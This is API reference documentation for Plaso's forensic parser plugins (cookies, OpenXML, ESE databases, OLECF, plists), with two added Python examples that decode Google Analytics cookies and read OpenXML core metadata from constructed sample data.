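An added example, not Plaso code, that decodes the __utma, __utmb, __utmt and __utmz values shown under plaso.parsers.cookie_plugins.ganalytics above and dispatches them the way BaseCookiePlugin.Process describes (ValueError when name or data are missing, a WrongPlugin error when the name is not one the plugin handles). The field names follow the attributes of GoogleAnalyticsEventData on this page (domain_hash, visitor_id, sessions, sources, pages_viewed). Three things are this example's assumptions rather than documented Plaso behaviour: the single-value form is treated as a POSIX time stored in 100 ns units, a 13-digit __utmb visit time is treated as milliseconds, and the __utmz key=value block is split off before the dots inside it can be mistaken for field separators.

```python
# Added example, not Plaso code: Google Analytics cookie decoders.
import datetime
from urllib.parse import unquote


class WrongPlugin(Exception):
    """Stand-in for errors.WrongPlugin: the cookie name is not ours."""


def _hundred_ns_to_posix(field):
    # Assumption: a lone numeric value is a POSIX time in 100 ns units
    # (13113225820000000 -> 1311322582).
    return int(field, 10) // 10000000


def parse_utma(data):
    fields = data.split('.')
    if len(fields) == 1:
        return {'last_visit': _hundred_ns_to_posix(fields[0])}
    if len(fields) != 6:
        raise ValueError('unexpected __utma layout: %r' % data)
    return {'domain_hash': fields[0], 'visitor_id': fields[1],
            'first_visit': int(fields[2]), 'previous_visit': int(fields[3]),
            'last_visit': int(fields[4]), 'sessions': int(fields[5])}


def parse_utmb(data):
    fields = data.split('.')
    if len(fields) == 1:
        return {'last_visit': _hundred_ns_to_posix(fields[0])}
    if len(fields) != 4:
        raise ValueError('unexpected __utmb layout: %r' % data)
    last_visit = int(fields[3])
    if len(fields[3]) == 13:  # assumption: 13 digit values are milliseconds
        last_visit //= 1000
    return {'domain_hash': fields[0], 'pages_viewed': int(fields[1]),
            'last_visit': last_visit}


def parse_utmt(data):
    return {'last_visit': _hundred_ns_to_posix(data)}


def parse_utmz(data):
    # Split at most four times: the trailing key=value block may itself contain
    # '.' (utmcsr=example.com) and a plain split('.') would shred it.
    fields = data.split('.', 4)
    if len(fields) == 1:
        return {'last_visit': _hundred_ns_to_posix(fields[0])}
    if len(fields) != 5:
        raise ValueError('unexpected __utmz layout: %r' % data)
    campaign = {}
    for item in fields[4].split('|'):
        if '=' in item:
            key, value = item.split('=', 1)
            campaign[key] = unquote(value)
    return {'domain_hash': fields[0], 'last_visit': int(fields[1]),
            'sessions': int(fields[2]), 'sources': int(fields[3]),
            'campaign': campaign}


COOKIE_PARSERS = {'__utma': parse_utma, '__utmb': parse_utmb,
                  '__utmt': parse_utmt, '__utmz': parse_utmz}


def process_cookie(cookie_name, cookie_data, url):
    """Dispatch like BaseCookiePlugin.Process: ValueError when name or data
    are missing, WrongPlugin when the name is not handled here."""
    if not cookie_name or not cookie_data:
        raise ValueError('cookie_name and cookie_data must be set')
    parser = COOKIE_PARSERS.get(cookie_name)
    if parser is None:
        raise WrongPlugin(cookie_name)
    if isinstance(cookie_data, bytes):
        cookie_data = cookie_data.decode('ascii', 'replace')
    record = parser(cookie_data)
    record['cookie_name'] = cookie_name
    record['url'] = url
    record['last_visit_utc'] = datetime.datetime.fromtimestamp(
        record['last_visit'], datetime.timezone.utc)
    return record


# Constructed sample inputs; the values are the examples given on this page.
SAMPLE_COOKIES = [
    ('__utma', b'137167072.1215918423.1383170166.1383170166.1383170166.1'),
    ('__utmb', b'173272373.6.8.1440489514899'),
    ('__utmz', b'207318870.1383170190.1.1.utmcsr=google|utmccn=(organic)|'
               b'utmcmd=organic|utmctr=(not%20provided)'),
    ('__utmt', b'13113215173000000'),
]

if __name__ == '__main__':
    for name, data in SAMPLE_COOKIES:
        print(name, process_cookie(name, data, 'https://example.test/'))
```

Cookie values are attacker-controlled input from the evidence: each decoder validates the field count before converting, and a malformed value raises instead of producing an event with silently wrong timestamps.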


plaso.parsers.cookie_plugins.manager module

The cookie plugins manager object.

class plaso.parsers.cookie_plugins.manager.CookiePluginsManager
Bases: object
Class that implements the cookie plugins manager.
classmethod DeregisterPlugin(plugin_class) Deregisters a plugin class. The plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – the class object of the plugin.
Raises KeyError – if plugin class is not set for the corresponding name.
classmethod GetPlugins() Retrieves the cookie plugins.
Returns list of all cookie plugin objects. Return type list[type]
classmethod RegisterPlugin(plugin_class) Registers a plugin class. The plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – the class object of the plugin.
Raises KeyError – if plugin class is already set for the corresponding name.
classmethod RegisterPlugins(plugin_classes) Registers plugin classes. The plugin classes are identified based on their lower case name.
Parameters plugin_classes (list[type]) – a list of class objects of the plugins.
Raises KeyError – if plugin class is already set for the corresponding name.

Module contents

Imports for the cookies parser. plaso.parsers.czip_plugins package

Submodules plaso.parsers.czip_plugins.interface module

Interface for compound ZIP file plugins.

class plaso.parsers.czip_plugins.interface.CompoundZIPPlugin
Bases: plaso.parsers.plugins.BasePlugin
Compound ZIP parser plugin.


CheckRequiredPaths(zip_file) Checks if the ZIP file has the minimal structure required by the plugin.
Parameters zip_file (zipfile.ZipFile) – the ZIP file. It should not be closed in this method, but will be closed by the parser logic in czip.py.
Returns True if the ZIP file has the minimum paths defined by the plugin, or False if it does not or no required paths are defined. The ZIP file can have more paths than specified by the plugin and still return True. Return type bool
DATA_FORMAT = 'Compound ZIP file'
NAME = 'czip_plugin'
Process(parser_mediator, zip_file=None, **kwargs) Extracts events from the ZIP file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• zip_file (Optional[zipfile.ZipFile]) – the ZIP file. It should not be closed in this method, but will be closed by the parser logic in czip.py.
Raises ValueError – if the ZIP file argument is not valid.
REQUIRED_PATHS = frozenset({})

plaso.parsers.czip_plugins.oxml module

Compound ZIP parser plugin for OpenXML files.

class plaso.parsers.czip_plugins.oxml.OpenXMLEventData
Bases: plaso.containers.events.EventData
OXML event data.
app_version version of application that created document. Type str
author name of author. Type str
creating_app name of application that created document. Type str
doc_security ??? Type str
hyperlinks_changed True if hyperlinks have changed.


Type bool
i4 ??? Type str
last_saved_by name of user that last saved the document. Type str
links_up_to_date True if the links are up to date. Type bool
number_of_characters number of characters without spaces in the document. Type int
number_of_characters_with_spaces number of characters including spaces in the document. Type int
number_of_lines number of lines in the document. Type int
number_of_pages number of pages in the document. Type int
number_of_paragraphs number of paragraphs in the document. Type int
number_of_words number of words in the document. Type int
revision_number revision number. Type int
scale_crop True if crop to scale is enabled. Type bool
shared_doc True if document is shared. Type bool
template name of template ??? Type str


total_time ??? Type str
DATA_TYPE = 'metadata:openxml'

class plaso.parsers.czip_plugins.oxml.OpenXMLPlugin
Bases: plaso.parsers.czip_plugins.interface.CompoundZIPPlugin
Parses metadata from OXML files.
DATA_FORMAT = 'OpenXML (OXML) file'
NAME = 'oxml'
REQUIRED_PATHS = frozenset({'[Content_Types].xml', '_rels/.rels', 'docProps/core.xml'})
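An added example, not Plaso code, that builds a minimal OpenXML package in memory, applies the REQUIRED_PATHS rule from CheckRequiredPaths and OpenXMLPlugin above (all three members present, extra members allowed, False when nothing is required), and reads the docProps/core.xml values that map onto the author, last_saved_by and revision_number attributes of O
penXMLEventData plus the created and modified timestamps. The package bytes and every element value are constructed sample data; the namespace URIs are the standard OPC core-properties and Dublin Core ones.

```python
# Added example, not Plaso code: REQUIRED_PATHS check and core.xml metadata.
import io
import xml.etree.ElementTree as ET
import zipfile

REQUIRED_PATHS = frozenset({'[Content_Types].xml', '_rels/.rels', 'docProps/core.xml'})

# Standard OPC core-properties namespaces; the element values below are sample data.
NAMESPACES = {
    'cp': 'http://schemas.openxmlformats.org/package/2006/metadata/core-properties',
    'dc': 'http://purl.org/dc/elements/1.1/',
    'dcterms': 'http://purl.org/dc/terms/',
}

SAMPLE_CORE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" xmlns:dcterms="%(dcterms)s">'
    '<dc:creator>alice</dc:creator>'
    '<cp:lastModifiedBy>bob</cp:lastModifiedBy>'
    '<cp:revision>7</cp:revision>'
    '<dcterms:created>2013-10-30T21:56:06Z</dcterms:created>'
    '<dcterms:modified>2013-10-31T08:00:00Z</dcterms:modified>'
    '</cp:coreProperties>'
) % NAMESPACES


def build_sample_package(include_core=True):
    """Return the bytes of a minimal .docx-like ZIP (constructed sample input)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, 'w', zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr('[Content_Types].xml', '<Types/>')
        zip_file.writestr('_rels/.rels', '<Relationships/>')
        zip_file.writestr('word/document.xml', '<document/>')  # an extra member
        if include_core:
            zip_file.writestr('docProps/core.xml', SAMPLE_CORE_XML)
    return buffer.getvalue()


def check_required_paths(zip_file, required_paths=REQUIRED_PATHS):
    """CheckRequiredPaths rule: all required members present, extras allowed,
    False when nothing is required."""
    if not required_paths:
        return False
    return set(required_paths).issubset(zip_file.namelist())


def required_paths_present(package_bytes, required_paths=REQUIRED_PATHS):
    """Convenience wrapper that opens the package bytes and applies the rule."""
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zip_file:
        return check_required_paths(zip_file, required_paths)


def parse_core_properties(package_bytes):
    """Return the OpenXMLEventData-style core metadata, or None when the ZIP
    does not have the OpenXML structure."""
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zip_file:
        if not check_required_paths(zip_file):
            return None
        root = ET.fromstring(zip_file.read('docProps/core.xml'))

    def text_of(path):
        node = root.find(path, NAMESPACES)
        return node.text if node is not None else None

    revision = text_of('cp:revision')
    return {
        'author': text_of('dc:creator'),
        'last_saved_by': text_of('cp:lastModifiedBy'),
        'revision_number': int(revision) if revision and revision.isdigit() else None,
        'created': text_of('dcterms:created'),
        'modified': text_of('dcterms:modified'),
    }


if __name__ == '__main__':
    print(parse_core_properties(build_sample_package()))
```

Two caveats for evidence files: zipfile raises zipfile.BadZipFile for input that is not a ZIP at all, which a caller should catch and report rather than let propagate, and the document XML is attacker-controlled, so a parser that is exposed to arbitrary documents should use defusedxml (or otherwise disable entity expansion) in place of the plain ElementTree call shown here.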

Module contents

Imports for the compound ZIP parser. plaso.parsers.esedb_plugins package

Submodules plaso.parsers.esedb_plugins.file_history module

Parser for the Microsoft File History ESE database.

class plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPlugin
Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Parses a File History ESE database file.
DATA_FORMAT = 'Windows 8 File History ESE database file'
NAME = 'file_history'
ParseNameSpace(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the namespace table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• cache (Optional[ESEDBCache]) – cache.
• database (Optional[ESEDatabase]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
REQUIRED_TABLES = {'backupset': '', 'file': '', 'library': '', 'namespace': 'ParseNameSpace'}


class plaso.parsers.esedb_plugins.file_history.FileHistoryNamespaceEventData
Bases: plaso.containers.events.EventData
File history namespace table event data.
file_attribute file attribute. Type int
identifier identifier. Type str
original_filename original file name. Type str
parent_identifier parent identifier. Type str
usn_number USN number. Type int
DATA_TYPE = 'file_history:namespace:event'

plaso.parsers.esedb_plugins.interface module

This file contains the interface for ESE database plugins.

class plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Bases: plaso.parsers.plugins.BasePlugin, plaso.lib.dtfabric_helper.DtFabricHelper
The ESE database plugin interface.
BINARY_DATA_COLUMN_TYPES = frozenset({pyesedb.column_types.LARGE_BINARY_DATA, pyesedb.column_types.BINARY_DATA})

CheckRequiredTables(database) Checks if the database has the minimal structure required by the plugin.
Parameters database (ESEDatabase) – ESE database to check.
Returns True if the database has the minimum tables defined by the plugin, or False if it does not or no required tables are defined. The database can have more tables than specified by the plugin and still return True. Return type bool
DATA_FORMAT = 'ESE database file'
FLOATING_POINT_COLUMN_TYPES = frozenset({pyesedb.column_types.DOUBLE_64BIT, pyesedb.column_types.FLOAT_32BIT})


INTEGER_COLUMN_TYPES = frozenset({pyesedb.column_types.INTEGER_32BIT_UNSIGNED, pyesedb.column_types.DATE_TIME, pyesedb.column_types.INTEGER_16BIT_UNSIGNED, pyesedb.column_types.INTEGER_64BIT_SIGNED, pyesedb.column_types.INTEGER_8BIT_UNSIGNED, pyesedb.column_types.INTEGER_32BIT_SIGNED, pyesedb.column_types.CURRENCY, pyesedb.column_types.INTEGER_16BIT_SIGNED})
NAME = 'esedb_plugin'
OPTIONAL_TABLES = {}
Process(parser_mediator, cache=None, database=None, **kwargs) Extracts events from an ESE database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
• cache (Optional[ESEDBCache]) – cache.
• database (Optional[ESEDatabase]) – ESE database.
Raises ValueError – if the database argument is not valid.
REQUIRED_TABLES = {}
STRING_COLUMN_TYPES = frozenset({pyesedb.column_types.TEXT, pyesedb.column_types.LARGE_TEXT})

plaso.parsers.esedb_plugins.msie_webcache module

Parser for the Microsoft Internet Explorer WebCache ESE database. The WebCache database (WebCacheV01.dat or WebCacheV24.dat) is used by MSIE as of version 10.

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData
Bases: plaso.containers.events.EventData
MSIE WebCache Container table event data.
access_count access count. Type int
cached_filename name of the cached file. Type str
cached_file_size size of the cached file. Type int
cache_identifier cache identifier. Type int
container_identifier container identifier.


Type int
entry_identifier entry identifier. Type int
file_extension file extension. Type str
redirect_url URL from which the request was redirected. Type str
request_headers request headers. Type str
response_headers response headers. Type str
sync_count sync count. Type int
url URL. Type str
DATA_TYPE = 'msie:webcache:container'

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventData
Bases: plaso.containers.events.EventData
MSIE WebCache Containers table event data.
container_identifier container identifier. Type int
directory name of the cache directory. Type str
name name of the cache container. Type str
set_identifier set identifier. Type int
DATA_TYPE = 'msie:webcache:containers'

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPlugin
Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin
Parses an MSIE WebCache ESE database file.
DATA_FORMAT = 'Internet Explorer WebCache ESE database (WebCacheV01.dat, WebCacheV24.dat) file'
NAME = 'msie_webcache'
OPTIONAL_TABLES = {'Partitions': 'ParsePartitionsTable', 'PartitionsEx': 'ParsePartitionsTable'}
ParseContainersTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a Containers table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
• database (Optional[ESEDatabase]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
ParseLeakFilesTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a LeakFiles table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
• database (Optional[ESEDatabase]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
ParsePartitionsTable(parser_mediator, database=None, table=None, **unused_kwargs) Parses a Partitions or PartitionsEx table.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS.
• database (Optional[ESEDatabase]) – ESE database.
• table (Optional[pyesedb.table]) – table.
Raises ValueError – if the database or table value is missing.
REQUIRED_TABLES = {'Containers': 'ParseContainersTable', 'LeakFiles': 'ParseLeakFilesTable'}

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData
Bases: plaso.containers.events.EventData
MSIE WebCache LeakFiles event data.
cached_filename name of the cached file. Type str


leak_identifier leak identifier. Type int DATA_TYPE = 'msie:webcache:leak_file' class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventData Bases: plaso.containers.events.EventData MSIE WebCache Partitions table event data. directory directory. Type str partition_identifier partition identifier. Type int partition_type partition type. Type int table_identifier table identifier. Type int DATA_TYPE = 'msie:webcache:partitions'

plaso.parsers.esedb_plugins.srum module

Parser for the System Resource Usage Monitor (SRUM) ESE database. For more information about the database format see: https://github.com/libyal/esedb-kb/blob/main/documentation/System%20Resource%20Usage%20Monitor%20(SRUM).asciidoc class plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData Bases: plaso.containers.events.EventData SRUM application resource usage event data. Note that the interpretation of some of these values is undocumented as far as currently known. application application. Type str background_bytes_read background number of bytes read. Type int background_bytes_written background number of bytes written. Type int


background_context_switches number of background context switches. Type int background_cycle_time background cycle time. Type int background_number_for_flushes background number of flushes. Type int background_number_for_read_operations background number of read operations. Type int background_number_for_write_operations background number of write operations. Type int face_time face time. Type int foreground_bytes_read foreground number of bytes read. Type int foreground_bytes_written foreground number of bytes written. Type int foreground_context_switches number of foreground context switches. Type int foreground_cycle_time foreground cycle time. Type int foreground_number_for_flushes foreground number of flushes. Type int foreground_number_for_read_operations foreground number of read operations. Type int foreground_number_for_write_operations foreground number of write operations. Type int identifier record identifier.


Type int user_identifier user identifier, which is a Windows NT security identifier. Type str DATA_TYPE = 'windows:srum:application_usage' class plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventData Bases: plaso.containers.events.EventData SRUM network connectivity usage event data. Note that the interpretation of some of these values is undocumented as far as currently known. application application. Type str identifier record identifier. Type int interface_luid interface locally unique identifier (LUID). Type int l2_profile_flags L2 profile flags. Type int l2_profile_identifier L2 profile identifier. Type int user_identifier user identifier, which is a Windows NT security identifier. Type str DATA_TYPE = 'windows:srum:network_connectivity' class plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData Bases: plaso.containers.events.EventData SRUM network data usage event data. Note that the interpretation of some of these values is undocumented as far as currently known. application application. Type str bytes_received number of bytes received. Type int bytes_sent number of bytes sent.


Type int identifier record identifier. Type int interface_luid interface locally unique identifier (LUID). Type int l2_profile_flags L2 profile flags. Type int l2_profile_identifier L2 profile identifier. Type int user_identifier user identifier, which is a Windows NT security identifier. Type str DATA_TYPE = 'windows:srum:network_usage' class plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPlugin Bases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin Parses a System Resource Usage Monitor (SRUM) ESE database file. DATA_FORMAT = 'System Resource Usage Monitor (SRUM) ESE database file' NAME = 'srum' OPTIONAL_TABLES = {'{973F5D5C-1D90-4944-BE8E-24B94231A174}': 'ParseNetworkDataUsage', '{D10CA2FE-6FCF-4F6D-848E-B2E99266FA89}': 'ParseApplicationResourceUsage', '{DD6636C4-8929-4683-974E-22C046A43763}': 'ParseNetworkConnectivityUsage'} ParseApplicationResourceUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the application resource usage table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. ParseNetworkConnectivityUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the network connectivity usage monitor table. Parameters


• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. ParseNetworkDataUsage(parser_mediator, cache=None, database=None, table=None, **unused_kwargs) Parses the network data usage monitor table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • cache (Optional[ESEDBCache]) – cache, which contains information about the identifiers stored in the SruDbIdMapTable table. • database (Optional[ESEDatabase]) – ESE database. • table (Optional[pyesedb.table]) – table. REQUIRED_TABLES = {'SruDbIdMapTable': ''}

Module contents

Imports for the ESE database parser.

plaso.parsers.olecf_plugins package

Submodules

plaso.parsers.olecf_plugins.automatic_destinations module

Plugin to parse .automaticDestinations-ms OLECF files. class plaso.parsers.olecf_plugins.automatic_destinations. AutomaticDestinationsDestListEntryEventData Bases: plaso.containers.events.EventData .automaticDestinations-ms DestList entry event data. birth_droid_file_identifier birth droid file identifier. Type str birth_droid_volume_identifier birth droid volume identifier. Type str droid_file_identifier droid file identifier. Type str


droid_volume_identifier droid volume identifier. Type str entry_number DestList entry number. Type int path path. Type str pin_status pin status. Type int offset offset of the DestList entry relative to the start of the DestList stream, from which the event data was extracted. Type int DATA_TYPE = 'olecf:dest_list:entry' class plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin, plaso.lib.dtfabric_helper.DtFabricHelper Plugin that parses an .automaticDestinations-ms OLECF file. DATA_FORMAT = 'Automatic destinations jump list OLE compound file (.automaticDestinations-ms)' NAME = 'olecf_automatic_destinations' ParseDestList(parser_mediator, olecf_item) Parses the DestList OLECF item. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • olecf_item (pyolecf.item) – OLECF item. Raises UnableToParseFile – if the DestList cannot be parsed. Process(parser_mediator, root_item=None, **kwargs) Extracts events from an OLECF file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root_item is not set. REQUIRED_ITEMS = frozenset({'DestList'})

plaso.parsers.olecf_plugins.default module

The default plugin for parsing OLE Compound Files (OLECF). class plaso.parsers.olecf_plugins.default.DefaultOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin Class to define the default OLECF file plugin. DATA_FORMAT = 'Generic OLE compound item' NAME = 'olecf_default' Process(parser_mediator, root_item=None, **kwargs) Extracts events from an OLECF file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root item is not set. class plaso.parsers.olecf_plugins.default.OLECFItemEventData Bases: plaso.containers.events.EventData OLECF item event data. name name of the OLE Compound File item. Type str size data size of the OLE Compound File item. Type int DATA_TYPE = 'olecf:item' plaso.parsers.olecf_plugins.interface module

This file contains the necessary interface for OLECF plugins. class plaso.parsers.olecf_plugins.interface.OLECFPlugin Bases: plaso.parsers.plugins.BasePlugin The OLECF parser plugin interface. DATA_FORMAT = 'OLE compound file' NAME = 'olecf_plugin' abstract Process(parser_mediator, root_item=None, **kwargs) Extracts events from an OLECF file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file.


REQUIRED_ITEMS = frozenset({})

plaso.parsers.olecf_plugins.summary module

Plugin to parse the OLECF summary/document summary information items. class plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin Plugin that parses DocumentSummaryInformation item from an OLECF file. DATA_FORMAT = 'Document summary information (\\0x05DocumentSummaryInformation)' NAME = 'olecf_document_summary' Process(parser_mediator, root_item=None, **kwargs) Extracts events from a document summary information OLECF item. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root item is not set. REQUIRED_ITEMS = frozenset({'\x05DocumentSummaryInformation'}) class plaso.parsers.olecf_plugins.summary.OLECFDocumentSummaryInformation(olecf_item) Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream OLECF Document Summary information property set. class plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream(olecf_item) Bases: object OLECF property set stream. date_time_properties date and time properties and values. Type dict[str, dfdatetime.DateTimeValues] GetEventData() Retrieves the properties as event data. Returns event data. Return type EventData class plaso.parsers.olecf_plugins.summary.OLECFSummaryInformation(olecf_item) Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream OLECF Summary information property set. class plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPlugin Bases: plaso.parsers.olecf_plugins.interface.OLECFPlugin Plugin that parses the SummaryInformation item from an OLECF file. DATA_FORMAT = 'Summary information (\\0x05SummaryInformation) (top-level only)' NAME = 'olecf_summary'


Process(parser_mediator, root_item=None, **kwargs) Extracts events from a summary information OLECF item. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • root_item (Optional[pyolecf.item]) – root item of the OLECF file. Raises ValueError – If the root item is not set. REQUIRED_ITEMS = frozenset({'\x05SummaryInformation'})

Module contents

This file contains an import statement for each OLECF plugin.

plaso.parsers.plist_plugins package

Submodules

plaso.parsers.plist_plugins.airport module

Plist parser plugin for Airport plist files. class plaso.parsers.plist_plugins.airport.AirportPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Airport plist files. DATA_FORMAT = 'Airport plist file' NAME = 'airport' PLIST_KEYS = frozenset({'RememberedNetworks'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.appleaccount module

Plist parser plugin for Apple Account plist files. class plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Apple Account plist files. Further details about fields within the key: Accounts: account name. FirstName: first name associated with the account. LastName: family name associate with the account. CreationDate: timestamp when the account was configured in the system. LastSuccessfulConnect: last time when the account was connected. ValidationDate: last time when the account was validated. DATA_FORMAT = 'Apple account information plist file' NAME = 'apple_id' PLIST_KEYS = frozenset({'AccessorVersions', 'Accounts', 'AuthCertificates'})


PLIST_PATH_FILTERS = frozenset({})

plaso.parsers.plist_plugins.bluetooth module

Plist parser plugin for Bluetooth plist files. class plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Bluetooth plist files. Additional details about the fields. LastInquiryUpdate: Device connected via Bluetooth Discovery. Updated when a device is detected in discovery mode. E.g. BT headphone power on. Pairing is not required for a device to be discovered and cached. LastNameUpdate: When the human name was last set. Usually done only once during initial setup. LastServicesUpdate: Time set when device was polled to determine what it is. Usually done at setup or manually requested via advanced menu. DATA_FORMAT = 'Bluetooth plist file' NAME = 'macosx_bluetooth' PLIST_KEYS = frozenset({'DeviceCache', 'PairedDevices'}) PLIST_PATH_FILTERS = frozenset({})

plaso.parsers.plist_plugins.default module

Default plist parser plugin. class plaso.parsers.plist_plugins.default.DefaultPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Default plist parser plugin. DATA_FORMAT = 'plist file' NAME = 'plist_default' plaso.parsers.plist_plugins.install_history module

Plist parser plugin for MacOS install history plist files. class plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for MacOS install history plist files. DATA_FORMAT = 'MacOS installation history plist file' NAME = 'macosx_install_history' PLIST_KEYS = frozenset({'date', 'displayName', 'displayVersion', 'packageIdentifiers', 'processName'})


PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.interface module

Interface for plist parser plugins. Plist files are only one example of a type of object that the Plaso tool is expected to encounter and process. There can be and are many other parsers which are designed to process specific data types. PlistPlugin defines the attributes necessary for registration, discovery and operation of plugins for plist files which will be used by PlistParser. class plaso.parsers.plist_plugins.interface.PlistPathFilter(filename) Bases: object The plist path filter. Match(filename_lower_case) Determines if a plist filename matches the filter. Note that this method does a case insensitive comparison. Parameters filename_lower_case (str) – filename of the plist in lower case. Returns True if the filename matches the filter. Return type bool class plaso.parsers.plist_plugins.interface.PlistPlugin Bases: plaso.parsers.plugins.BasePlugin This is an abstract class from which plugins should be based. The following are the attributes and methods expected to be overridden by a plugin. PLIST_PATH_FILTERS plist path filters that should match for the plugin to process the plist. Type set[PlistPathFilter] PLIST_KEY keys holding values that are necessary for processing. Type set[str] Please note, PLIST_KEY is case sensitive and for a plugin to match a plist file needs to contain at minimum the number of keys needed for processing. For example if a Plist file contains the following keys, {'foo': 1, 'bar': 2, 'opt': 3} with 'foo' and 'bar' being keys critical to processing define PLIST_KEY as ['foo', 'bar']. If 'opt' is only optionally defined it can still be accessed by manually processing self.top_level from the plugin. NAME = 'plist_plugin' PLIST_KEYS = frozenset({'any'}) PLIST_PATH_FILTERS = frozenset({}) Process(parser_mediator, top_level=None, **kwargs) Extracts events from a plist file. Parameters


• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • top_level (Optional[dict[str, object]]) – plist top-level item. class plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter(filename) Bases: plaso.parsers.plist_plugins.interface.PlistPathFilter The prefix plist path filter. Match(filename_lower_case) Determines if a plist filename matches the filter. Note that this method does a case insensitive comparison. Parameters filename_lower_case (str) – filename of the plist in lower case. Returns True if the filename matches the filter. Return type bool

plaso.parsers.plist_plugins.ipod module

Plist parser plugin for iPod, iPad and iPhone storage plist files. class plaso.parsers.plist_plugins.ipod.IPodPlistEventData Bases: plaso.containers.events.EventData iPod plist event data. device_id unique identifier of the iPod device. Type str DATA_TYPE = 'ipod:device:entry' class plaso.parsers.plist_plugins.ipod.IPodPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for iPod, iPad and iPhone storage plist files. DATA_FORMAT = 'iPod, iPad and iPhone plist file' NAME = 'ipod_device' PLIST_KEYS = frozenset({'Devices'}) PLIST_PATH_FILTERS = frozenset({})

plaso.parsers.plist_plugins.launchd module

Plist parser plugin for launchd plist files. class plaso.parsers.plist_plugins.launchd.LaunchdPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for launchd plist files. Further details about fields within the key: Label: the required key for uniquely identifying the launchd service.


